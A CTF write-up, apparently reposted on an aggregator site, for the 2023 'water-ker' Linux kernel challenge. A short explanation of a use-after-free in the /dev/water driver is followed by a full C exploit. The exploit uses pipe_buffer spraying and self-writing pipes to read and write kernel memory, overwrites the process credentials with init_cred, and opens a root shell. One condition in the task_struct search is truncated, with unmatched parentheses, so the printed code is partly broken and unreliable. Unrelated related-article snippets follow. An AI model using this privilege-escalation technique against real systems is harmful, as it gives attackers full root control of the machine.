[pipe-自写管道] 强网拟态2023-water-ker

程序分析

保护当然都开了, 题目给了一次增加, 释放, 修改一字节堆块的能力, 这里释放堆块后没有将其指针置空从而导致了 UAF.

漏洞利用

这里的堆块大小为 512 字节并是 SLAB_ACCOUNT, 所以可以直接利用管道去构造自写管道从而构造任意读写系统, 详细见大佬博客:【CTF.0x08】D^ 3CTF2023 d3kcache 出题手记 - arttnba3's blog

exp 如下:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <stdint.h>size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
size_t init_task, init_nsproxy, init_cred;size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{size_t page_count;page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;return vmemmap_base + page_count * 0x40;
}void err_exit(char *msg)
{printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);sleep(5);exit(EXIT_FAILURE);
}void binary_dump(char *desc, void *addr, int len) {uint64_t *buf64 = (uint64_t *) addr;uint8_t *buf8 = (uint8_t *) addr;if (desc != NULL) {printf("\033[33m[*] %s:\n\033[0m", desc);}for (int i = 0; i < len / 8; i += 4) {printf("  %04x", i * 8);for (int j = 0; j < 4; j++) {i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");}printf("   ");for (int j = 0; j < 32 && j + i * 8 < len; j++) {printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');}puts("");}
}/* root checker and shell poper */
void get_root_shell(void)
{if(getuid()) {puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");sleep(5);exit(EXIT_FAILURE);}puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");system("/bin/sh");/* to exit the process normally, instead of segmentation fault */exit(EXIT_SUCCESS);
}/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{__asm__("mov user_cs, cs;""mov user_ss, ss;""mov user_sp, rsp;""pushf;""pop user_rflags;");printf("\033[34m\033[1m[*] Status has been saved.\033[0m\n");
}/* bind the process to specific core */
void bind_core(int core)
{cpu_set_t cpu_set;CPU_ZERO(&cpu_set);CPU_SET(core, &cpu_set);sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}struct page;
struct pipe_inode_info;
struct pipe_buf_operations;/* read start from len to offset, write start from offset */
struct pipe_buffer {struct page *page;unsigned int offset, len;const struct pipe_buf_operations *ops;unsigned int flags;unsigned long private;
};struct pipe_buf_operations {int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);void (*release)(struct pipe_inode_info *, struct pipe_buffer *);int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};int fd;
struct argg {char* buf;
};void add(char* buf)
{struct argg arg = { .buf = buf };ioctl(fd, 0x20, &arg);
}void dele(char* buf)
{struct argg arg = { .buf = buf };ioctl(fd, 0x30, &arg);
}void edit(char* buf)
{struct argg arg = { .buf = buf };ioctl(fd, 0x50, &arg);
}#define PIPE_SPRAY_NUM 200
#define SND_PIPE_BUF_SZ 96
#define TRD_PIPE_BUF_SZ 192
int orig_idx;
int victim_idx;
int pipe_fd[PIPE_SPRAY_NUM][2];
struct pipe_buffer evil_2nd_buf, evil_3rd_buf, evil_4th_buf;
int self_4th_pipe_idx = -1;
int self_2nd_pipe_idx = -1;
int self_3rd_pipe_idx = -1;
char temp_zero_buf[0x1000] = {'\0'};void arbitrary_read_by_pipe(struct page *page_to_read, void *dst)
{evil_2nd_buf.offset = 0;evil_2nd_buf.len = 0x1ff8;evil_2nd_buf.page = page_to_read;write(pipe_fd[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));write(pipe_fd[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));write(pipe_fd[self_4th_pipe_idx][1],temp_zero_buf,TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));write(pipe_fd[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));read(pipe_fd[self_2nd_pipe_idx][0], dst, 0xfff);
}void arbitrary_write_by_pipe(struct page *page_to_write, void *src, size_t len)
{evil_2nd_buf.page = page_to_write;evil_2nd_buf.offset = 0;evil_2nd_buf.len = 0;write(pipe_fd[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));write(pipe_fd[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));write(pipe_fd[self_4th_pipe_idx][1],temp_zero_buf,TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));write(pipe_fd[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));write(pipe_fd[self_2nd_pipe_idx][1], src, len);
}int main(int argc, char** argv, char** envp)
{save_status();bind_core(0);fd = open("/dev/water", O_RDWR);if (fd < 0) err_exit("open /dev/water");char * buf = malloc(0x3000);char target[16] = { 0 };size_t target_addr;memset(buf, 'A', 0x1000);strcpy(target, "XiaozaYaPwner");if (prctl(PR_SET_NAME, target, 0, 0, 0) != 0){err_exit("cannot set name");}add(buf);dele(buf);puts("[+] Spary pipe_buffer");for (int i = 0; i < PIPE_SPRAY_NUM; i++){if (pipe(pipe_fd[i]) < 0){printf("[X] failed to alloc %d pipe\n", i);err_exit("Alloc Pipe");}}puts("[+] Shrink pipe_buffer to 512B");for (int i = 0; i < PIPE_SPRAY_NUM; i++){if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 8) < 0){printf("[X] failed to fcntl %d pipe\n", i);err_exit("Fcntl Pipe");}}puts("[+] Wirte TAG to pipe");for (int i = 0; i < PIPE_SPRAY_NUM; i++){write(pipe_fd[i][1], "XiaozaYa", 8);write(pipe_fd[i][1], &i, sizeof(int));write(pipe_fd[i][1], &i, sizeof(int));write(pipe_fd[i][1], &i, sizeof(int));write(pipe_fd[i][1], "AAAAAAAA", 8);write(pipe_fd[i][1], "BBBBBBBB", 8);}buf[0] = '\x00';edit(buf);puts("[+] Read pipe to check victim pipe idx");orig_idx = -1;victim_idx = -1;for (int  i = 0; i < PIPE_SPRAY_NUM; i++){char tag[0x10];int nr;memset(tag, 0, sizeof(tag));read(pipe_fd[i][0], tag, 8);read(pipe_fd[i][0], &nr, sizeof(int));if (!strcmp(tag, "XiaozaYa") && nr != i){orig_idx = nr;victim_idx = i;printf("\033[32m\033[1m[+] Found victim: \033[0m%d ""\033[32m\033[1m, orig: \033[0m%d\n\n",victim_idx, orig_idx);//break;}}if (orig_idx == -1 || victim_idx == -1){err_exit("UAF ERROR");}int snd_orig_idx = -1;int snd_victim_idx = -1;struct pipe_buffer info_pipe_buf;puts("[+] Snd pipe");size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ / sizeof(struct pipe_buffer));memset(buf, 0, sizeof(buf));write(pipe_fd[victim_idx][1], buf, SND_PIPE_BUF_SZ * 2 - 24 - 3 * sizeof(int));puts("[+]  free original pipe");close(pipe_fd[orig_idx][0]);close(pipe_fd[orig_idx][1]);puts("[+]  fcntl to set the pipe_buffer on victim page");for (int i = 0; i < PIPE_SPRAY_NUM; i++){if (i == orig_idx || i == victim_idx){continue;}if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0){printf("[X] failed to fcntl %d pipe at snd pipe\n", i);err_exit("Fcntl Pipe");}}read(pipe_fd[victim_idx][0], buf, SND_PIPE_BUF_SZ - 8 - sizeof(int));read(pipe_fd[victim_idx][0], &info_pipe_buf, sizeof(info_pipe_buf));printf("\033[34m\033[1m[?] info_pipe_buf->page: \033[0m%p\n""\033[34m\033[1m[?] info_pipe_buf->ops: \033[0m%p\n",info_pipe_buf.page, info_pipe_buf.ops);if ((size_t)info_pipe_buf.page < 0xffff000000000000 || (size_t)info_pipe_buf.ops < 0xffffffff81000000){err_exit("FAILED to re-hit victim page!");}puts("\033[32m\033[1m[+] Successfully to hit the UAF page!\033[0m");printf("\033[32m\033[1m[+] Got page leak:\033[0m %p\n", info_pipe_buf.page);puts("[+]  construct a second-level uaf pipe page");info_pipe_buf.page = (struct page *)((size_t)info_pipe_buf.page + 0x40);write(pipe_fd[victim_idx][1], &info_pipe_buf, sizeof(info_pipe_buf));for (int i = 0; i < PIPE_SPRAY_NUM; i++){//char tag[0x10] = { 0 };int nr;if (i == orig_idx || i == victim_idx){continue;}//read(pipe_fd[i][0], tag, 8);read(pipe_fd[i][0], &nr, sizeof(int));//      printf("idx: %#x\n", nr);//if (!strcmp(tag, "XiaozaYa") && i != nr)if (i < PIPE_SPRAY_NUM && i != nr){snd_orig_idx = nr;snd_victim_idx = i;printf("\033[32m\033[1m[+] Found second-level victim: \033[0m%d ""\033[32m\033[1m, orig: \033[0m%d\n",snd_victim_idx, snd_orig_idx);break;}}if (snd_orig_idx == -1 || snd_victim_idx == -1){err_exit("FAILED to corrupt second-level pipe_buffer!");}size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ / sizeof(struct pipe_buffer));struct pipe_buffer evil_pipe_buf;struct page *page_ptr;memset(buf, 0, sizeof(buf));write(pipe_fd[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - 24 - 3 * sizeof(int));puts("[*] free second-level original pipe...");close(pipe_fd[snd_orig_idx][0]);close(pipe_fd[snd_orig_idx][1]);puts("[*] fcntl() to set the pipe_buffer on second-level victim page...");for (int i = 0; i < PIPE_SPRAY_NUM; i++){if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){continue;}if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0){printf("[x] failed to resize %d pipe!\n", i);err_exit("FAILED to re-alloc pipe_buffer!");}}puts("[*] hijacking the 2nd pipe_buffer on page to itself...");evil_pipe_buf.page = info_pipe_buf.page;evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;evil_pipe_buf.len = TRD_PIPE_BUF_SZ;evil_pipe_buf.ops = info_pipe_buf.ops;evil_pipe_buf.flags = info_pipe_buf.flags;evil_pipe_buf.private = info_pipe_buf.private;write(pipe_fd[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));for (int i = 0; i < PIPE_SPRAY_NUM; i++){if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){continue;}read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));if (page_ptr == evil_pipe_buf.page){self_2nd_pipe_idx = i;printf("\033[32m\033[1m[+] Found self-writing pipe: \033[0m%d\n",self_2nd_pipe_idx);break;}}if (self_2nd_pipe_idx == -1){err_exit("FAILED to build a self-writing pipe!");}puts("[*] hijacking the 3rd pipe_buffer on page to itself...");evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;evil_pipe_buf.len = TRD_PIPE_BUF_SZ;write(pipe_fd[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));write(pipe_fd[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));for (int i = 0; i < PIPE_SPRAY_NUM; i++){if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx){continue;}read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));if (page_ptr == evil_pipe_buf.page){self_3rd_pipe_idx = i;printf("\033[32m\033[1m[+] Found another self-writing pipe:\033[0m""%d\n",self_3rd_pipe_idx);break;}}if (self_3rd_pipe_idx == -1){err_exit("FAILED to build a self-writing pipe!");}puts("[*] hijacking the 4th pipe_buffer on page to itself...");evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;evil_pipe_buf.len = TRD_PIPE_BUF_SZ;write(pipe_fd[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));write(pipe_fd[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));for (int i = 0; i < PIPE_SPRAY_NUM; i++){if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx || i == self_3rd_pipe_idx){continue;}read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));if (page_ptr == evil_pipe_buf.page){self_4th_pipe_idx = i;printf("\033[32m\033[1m[+] Found another self-writing pipe:\033[0m""%d\n",self_4th_pipe_idx);break;}}if (self_4th_pipe_idx == -1){err_exit("FAILED to build a self-writing pipe!");}puts("[*] Setting up kernel arbitrary read & write...");memcpy(&evil_2nd_buf, &info_pipe_buf, sizeof(evil_2nd_buf));memcpy(&evil_3rd_buf, &info_pipe_buf, sizeof(evil_3rd_buf));memcpy(&evil_4th_buf, &info_pipe_buf, sizeof(evil_4th_buf));evil_2nd_buf.offset = 0;evil_2nd_buf.len = 0xff0;evil_3rd_buf.offset = TRD_PIPE_BUF_SZ * 3;evil_3rd_buf.len = 0;write(pipe_fd[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));evil_4th_buf.offset = TRD_PIPE_BUF_SZ;evil_4th_buf.len = 0;vmemmap_base = (size_t)info_pipe_buf.page & 0xfffffffff0000000;for (;;){arbitrary_read_by_pipe((struct page *)(vmemmap_base + 157 * 0x40), buf);if (*(uint64_t *)buf > 0xffffffff81000000 && ((*(uint64_t *)buf & 0xfff) == 0x0e0)){kernel_base = *(uint64_t *)buf - 0x0e0;kernel_offset = kernel_base - 0xffffffff81000000;printf("\033[32m\033[1m[+] Found kernel base: \033[0m0x%lx\n""\033[32m\033[1m[+] Kernel offset: \033[0m0x%lx\n",kernel_base, kernel_offset);break;}vmemmap_base -= 0x10000000;}printf("\033[32m\033[1m[+] vmemmap_base:\033[0m 0x%lx\n\n", vmemmap_base);uint64_t parent_task, current_task;puts("[*] Seeking task_struct in memory...");uint64_t *comm_addr = 0;uint64_t *point_buf = malloc(0x1000);for (int i = 0; 1; i++){arbitrary_read_by_pipe((struct page *)(vmemmap_base + i * 0x40), point_buf);comm_addr = memmem(point_buf, 0xf00, target, 0xd);if (comm_addr && (comm_addr[-2] > 0xffff888000000000) && (comm_addr[-3] > 0xffff888000000000) && (comm_addr[-57] > 0xffff888000000000) && (comm_addr[-56] > 0xffff888000){parent_task = comm_addr[-60];current_task = comm_addr[-54] - 2528;page_offset_base = (comm_addr[-54] & 0xfffffffffffff000) - i * 0x1000;page_offset_base &= 0xfffffffff0000000;printf("\033[32m\033[1m[+] Found task_struct on page: \033[0m%p\n",(struct page *)(vmemmap_base + i * 0x40));printf("\033[32m\033[1m[+] page_offset_base: \033[0m0x%lx\n",page_offset_base);printf("\033[34m\033[1m[*] current task_struct's addr: \033[0m""0x%lx\n\n",current_task);break;}}size_t *tsk_buf;uint64_t init_task = 0xffffffff83011200+kernel_offset;uint64_t init_cred = 0xffffffff8308c620+kernel_offset;uint64_t init_nsproxy = 0xffffffff8308c140+kernel_offset;printf("\033[32m\033[1m[+] Found init_cred: \033[0m0x%lx\n", init_cred);printf("\033[32m\033[1m[+] Found init_cred: \033[0m0x%lx\n", init_cred);printf("\033[32m\033[1m[+] Found init_nsproxy:\033[0m0x%lx\n", init_nsproxy);puts("[*] Escalating ROOT privilege now...");size_t current_task_page = direct_map_addr_to_page_addr(current_task);arbitrary_read_by_pipe((struct page *)current_task_page, buf);arbitrary_read_by_pipe((struct page *)(current_task_page + 0x40), &buf[512 * 8]);tsk_buf = (size_t *)((size_t)buf + (current_task & 0xfff));tsk_buf[367] = init_cred;tsk_buf[368] = init_cred;tsk_buf[381] = init_nsproxy;arbitrary_write_by_pipe((struct page *)current_task_page, buf, 0xff0);arbitrary_write_by_pipe((struct page *)(current_task_page + 0x40),&buf[512 * 8], 0xff0);puts("[+] Done.\n");puts("[*] checking for root...");get_root_shell();puts("[+] END!");return 0;
}

效果如下:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/189020.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

NSF服务器

NSF服务器

1.简介 1.1 NFS背景介绍 NFS是一种古老的用于在UNIX/Linux主机之间进行文件共享的协议。它古老到你必须穿着白大补才能接近一台计算机的年代。在那个年代&#xff0c;所有的联网计算机都被认为是可信的&#xff0c;而不像现今这样&#xff0c;任何人都有多种多样方法能连接到你…
阅读更多...
【解决】conda-script.py: error: argument COMMAND: invalid choice: ‘activate‘

【解决】conda-script.py: error: argument COMMAND: invalid choice: ‘activate‘

运行conda activate base报错&#xff1a; 试了网上找到的解决方法都不行&#xff1a; 最后切换了一下terminal&#xff1a; 从powershell改回cmd&#xff08;不知道为什么一开始手贱换成powershell&#xff09; 就可以了
阅读更多...
(一)七种元启发算法(DBO、LO、SWO、COA、LSO、KOA、GRO)求解无人机路径规划MATLAB

(一)七种元启发算法(DBO、LO、SWO、COA、LSO、KOA、GRO)求解无人机路径规划MATLAB

一、七种算法&#xff08;DBO、LO、SWO、COA、LSO、KOA、GRO&#xff09;简介 1、蜣螂优化算法DBO 蜣螂优化算法&#xff08;Dung beetle optimizer&#xff0c;DBO&#xff09;由Jiankai Xue和Bo Shen于2022年提出&#xff0c;该算法主要受蜣螂的滚球、跳舞、觅食、偷窃和繁…
阅读更多...
Python - 利用 OCR 技术提取视频台词、字幕

Python - 利用 OCR 技术提取视频台词、字幕

目录 一.引言 二.视频处理 1.视频样式 2.视频截取 ◆ 裁切降帧 ◆ 处理效果 3.视频分段 三.OCR 处理 1.视频帧处理 2.文本识别结果 3.后续工作与优化 ◆ 识别去重 ◆ 多线程提效 ◆ 片头片尾优化 四.总结 一.引言 视频经常会配套对应的台词或者字幕&#xff0c…
阅读更多...
4.HTML网页开发的工具

4.HTML网页开发的工具

4. 网页开发的工具 4.1 快捷键 4.1.1 快速复制一行 快捷键&#xff1a;shiftalt下箭头&#xff08;上箭头&#xff09; 或者ctrlc 然后 ctrlv 4.1.2 选定多个相同的单词 快捷键&#xff1a; ctrld 4.1.3 添加多个光标 快捷键&#xff1a;ctrlalt上箭头&#xff08;下箭头&…
阅读更多...
CS224W6.1——介绍图神经网络GNN

CS224W6.1——介绍图神经网络GNN

之前我们讨论了一些节点嵌入技术&#xff0c;它们可以通过随机游走的过程学习与任务无关的特征。从这篇开始&#xff0c;我们介绍了令人兴奋的图神经网络技术&#xff0c;该技术基于图结构用多层非线性变换对节点特征进行编码。图神经网络在各种任务中表现出非凡的性能&#xf…
阅读更多...
vue3响应式api

vue3响应式api

响应式api——compositon api setup&#xff1a; 不要再想this问题执行是在beforeCreated之前 beforeCreated&#xff1a;也就是创建了一个实例 created&#xff1a;挂载了数据 通过形参props接收&#xff0c;只读 以后所有代码都写到setup中 判断是否只读&#xff1a;isReadon…
阅读更多...
Zabbix SNMPv3

Zabbix SNMPv3

一、Snmpv3简述 SNMPv3是Simple Network Management Protocol version 3&#xff08;简单网络管理协议第三版&#xff09;的缩写。它是一种网络管理协议&#xff0c;用于监控和管理网络中的设备、系统和应用程序。 相对于之前的版本&#xff0c;SNMPv3具有更强的安全性和扩展…
阅读更多...
spring-cloud-stream

spring-cloud-stream

系列文章目录 第一章 Java线程池技术应用 第二章 CountDownLatch和Semaphone的应用 第三章 Spring Cloud 简介 第四章 Spring Cloud Netflix 之 Eureka 第五章 Spring Cloud Netflix 之 Ribbon 第六章 Spring Cloud 之 OpenFeign 第七章 Spring Cloud 之 GateWay 第八章 Sprin…
阅读更多...
IIS前端服务和代理

IIS前端服务和代理

前端服务可以用nginx和IIS开启&#xff0c;windows自带IIS方便管理一点。其实用docker的nginx更方便管理。 记录一下IIS的安装和开启服务过程 1、打开控制面板点击程序&#xff0c;再点击启用或关闭windows功能。 2、 点击左侧启用或关闭Windows功能。 3、把框框中全选上之后点…
阅读更多...
便捷Benchmark.sh 自动匹配workload(自用)

便捷Benchmark.sh 自动匹配workload(自用)

​ 因为db_bench选项太多&#xff0c;而测试纬度很难做到统一&#xff08;可能一个memtable大小的配置都会导致测试出来的写性能相关的的数据差异很大&#xff09;&#xff0c;所以官方给出了一个benchmark.sh脚本用来对各个workload进行测试。 该脚本能够将db_bench测试结果中…
阅读更多...
CMOS介绍

CMOS介绍

1 二极管 2 CMOS 2.1 栅极、源极、漏极 2.2 内部结构 2.2 导电原理 - 原理&#xff1a;1.通过门级和衬底加一个垂直电场Ev&#xff0c;从而在两口井之间形成反形层2.如果加的电场足够强&#xff0c;反形层就可以把source&#xff08;源极&#xff09;和drain&#xff08;漏极…
阅读更多...
Doris学习--1、Doris简介、操作Doris、Doris架构(数据模型)

Doris学习--1、Doris简介、操作Doris、Doris架构(数据模型)

星光下的赶路人star的个人主页 心之所向&#xff0c;剑之所往 文章目录 1、Doris简介1.1 快速开始1.2 安装配置1.2.1 应知前提1.2.2 配置Doris1.2.2.0 配置前提1.2.2.1 配置FE&#xff08;Frontend&#xff09;1.2.2.2 启动FE1.2.2.3 连接FE1.2.2.4 停止FE1.2.2.5 配置BE&#…
阅读更多...
物联网水表电子阀工作原理是怎样的?

物联网水表电子阀工作原理是怎样的?

随着科技的不断发展&#xff0c;物联网技术逐渐深入到我们的生活之中。作为智能家居的重要组成部分&#xff0c;物联网水表电子阀凭借其智能化、节能环保等优势&#xff0c;受到了越来越多用户的青睐。接下来&#xff0c;合众小编将来为大家介绍下物联网水表电子阀工作原理。 一…
阅读更多...
Git 进阶使用

Git 进阶使用

一. Git图形化操作 1.1.什么是图形化管理工具 图形化管理工具是一种通过可视化界面来操作计算机系统或应用程序的软件工具。在软件开发中&#xff0c;它通常用于管理和操作版本控制系统&#xff08;如Git、SVN等&#xff09;以及代码开发环境&#xff08;如IDE&#xff09;。与…
阅读更多...
SSM图书管理系统开发mysql数据库web结构java编程计算机网页源码eclipse项目

SSM图书管理系统开发mysql数据库web结构java编程计算机网页源码eclipse项目

一、源码特点 SSM 图书管理系统是一套完善的信息系统&#xff0c;结合springboot框架和bootstrap完成本系统&#xff0c;对理解JSP java编程开发语言有帮助系统采用SSM框架&#xff08;MVC模式开发&#xff09;&#xff0c;系统具有完整的源代码和 数据库&#xff0c;系统主要…
阅读更多...
(二)正点原子I.MX6ULL u-boot移植

(二)正点原子I.MX6ULL u-boot移植

一、概述 这里使用的是NXP官方2022.04发布的uboot&#xff0c;移植到正点原子阿尔法开发板&#xff08;v2.1&#xff09; u-boot下载&#xff1a;gitgithub.com:nxp-imx/uboot-imx.git 移植是基于NXP的mx6ull_14x14_evk 二、编译NXP官方uboot 进入NXP的u-boot目录 先在Makefile…
阅读更多...
Word 插入的 Visio 图片显示为{EMBED Visio.Drawing.11} 解决方案

Word 插入的 Visio 图片显示为{EMBED Visio.Drawing.11} 解决方案

World中&#xff0c;如果我们插入了Visio图还用了Endnote&#xff0c; 就可能出现&#xff1a;{EMBED Visio.Drawing.11}问题 解决方案&#xff1a; 1.在相应的文字上右击&#xff0c;在出现的快捷菜单中单击“切换域代码”&#xff0c;一个一个的修复。 2.在菜单工具–>…
阅读更多...
亚马逊云AI应用科技创新下的Amazon SageMaker使用教程

亚马逊云AI应用科技创新下的Amazon SageMaker使用教程

目录 Amazon SageMaker简介 Amazon SageMaker在控制台的使用 模型的各项参数 pytorch训练绘图部分代码 Amazon SageMaker简介 亚马逊SageMaker是一种完全托管的机器学习服务。借助 SageMaker&#xff0c;数据科学家和开发人员可以快速、轻松地构建和训练机器学习模型&#…
阅读更多...
Apache APISIX Dashboard 未经认证访问导致 RCE(CVE-2021-45232)漏洞复现

Apache APISIX Dashboard 未经认证访问导致 RCE(CVE-2021-45232)漏洞复现

漏洞描述 Apache APISIX 是一个动态、实时、高性能的 API 网关&#xff0c;而 Apache APISIX Dashboard 是一个简单易用的前端界面&#xff0c;用于管理 Apache APISIX。 在 2.10.1 之前的 Apache APISIX Dashboard 中&#xff0c;Manager API 使用了两个框架&#xff0c;并在…
阅读更多...
最新文章
推荐文章

Copyright @ 2022~2023